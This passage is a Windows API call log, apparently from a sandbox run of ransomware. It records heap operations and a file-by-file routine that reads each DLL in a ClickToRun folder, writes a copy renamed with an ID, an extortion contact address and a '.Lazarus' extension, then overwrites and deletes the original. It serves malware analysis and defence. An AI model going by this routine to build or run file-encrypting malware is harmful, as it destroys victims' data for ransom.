[0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0088.730] AreFileApisANSI () returned 1 [0088.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0088.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0088.730] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.730] AreFileApisANSI () returned 1 [0088.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0088.730] GetLastError () returned 0x0 [0088.730] SetLastError (dwErrCode=0x0) [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0d8 [0088.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0088.731] GetLastError () returned 0x0 [0088.731] SetLastError (dwErrCode=0x0) [0088.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8af48 [0088.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0088.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.731] AreFileApisANSI () returned 1 [0088.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0088.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x132) returned 0x4e568 [0088.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=153 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 153 [0088.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.739] GetFileType (hFile=0x348) returned 0x1 [0088.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0088.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.739] AreFileApisANSI () returned 1 [0088.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0088.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0088.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0088.739] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.740] GetFileType (hFile=0x360) returned 0x1 [0088.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0088.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0088.740] GetLastError () returned 0x0 [0088.740] SetLastError (dwErrCode=0x0) [0088.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0088.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0088.740] GetLastError () returned 0x0 [0088.740] SetLastError (dwErrCode=0x0) [0088.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0088.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.740] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0088.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0088.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0088.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x48c98 [0088.877] GetLastError () returned 0x0 [0088.877] SetLastError (dwErrCode=0x0) [0088.878] GetLastError () returned 0x0 [0088.878] SetLastError (dwErrCode=0x0) [0088.878] GetLastError () returned 0x0 [0088.878] SetLastError (dwErrCode=0x0) [0088.878] GetLastError () returned 0x0 [0088.878] SetLastError (dwErrCode=0x0) [0088.878] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.878] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.879] GetLastError () returned 0x0 [0088.879] SetLastError (dwErrCode=0x0) [0088.879] GetLastError () returned 0x0 [0088.879] SetLastError (dwErrCode=0x0) [0088.879] GetLastError () returned 0x0 [0088.880] SetLastError (dwErrCode=0x0) [0088.880] GetLastError () returned 0x0 [0088.880] SetLastError (dwErrCode=0x0) [0088.880] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.880] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.880] GetLastError () returned 0x0 [0088.880] SetLastError (dwErrCode=0x0) [0088.880] GetLastError () returned 0x0 [0088.880] SetLastError (dwErrCode=0x0) [0088.880] GetLastError () returned 0x0 [0088.880] SetLastError (dwErrCode=0x0) [0088.881] GetLastError () returned 0x0 [0088.881] SetLastError (dwErrCode=0x0) [0088.881] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.881] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.881] GetLastError () returned 0x0 [0088.881] SetLastError (dwErrCode=0x0) [0088.881] GetLastError () returned 0x0 [0088.881] SetLastError (dwErrCode=0x0) [0088.881] GetLastError () returned 0x0 [0088.881] SetLastError (dwErrCode=0x0) [0088.881] GetLastError () returned 0x0 [0088.881] SetLastError (dwErrCode=0x0) [0088.882] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0xac0, lpOverlapped=0x0) returned 1 [0088.882] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.882] GetLastError () returned 0x0 [0088.882] SetLastError (dwErrCode=0x0) [0088.882] GetLastError () returned 0x0 [0088.882] SetLastError (dwErrCode=0x0) [0088.882] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0088.882] GetLastError () returned 0x0 [0088.882] SetLastError (dwErrCode=0x0) [0088.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0088.883] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327ef70*=0xac0, lpOverlapped=0x0) returned 1 [0088.883] GetLastError () returned 0x0 [0088.883] SetLastError (dwErrCode=0x0) [0088.883] GetLastError () returned 0x0 [0088.883] SetLastError (dwErrCode=0x0) [0088.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0088.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0088.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x48c98 | out: hHeap=0x20000) returned 1 [0088.883] CloseHandle (hObject=0x348) returned 1 [0088.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.885] CloseHandle (hObject=0x360) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.885] AreFileApisANSI () returned 1 [0088.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0088.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0088.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0088.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.886] GetFileType (hFile=0x360) returned 0x1 [0088.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.887] GetLastError () returned 0xb7 [0088.887] SetLastError (dwErrCode=0xb7) [0088.887] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0088.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.888] CloseHandle (hObject=0x360) returned 1 [0088.888] AreFileApisANSI () returned 1 [0088.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0088.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0088.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0088.888] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll")) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0088.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.890] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0088.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0088.891] AreFileApisANSI () returned 1 [0088.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 94 [0088.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0088.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.891] AreFileApisANSI () returned 1 [0088.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0088.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x4ebc8 [0088.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0088.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 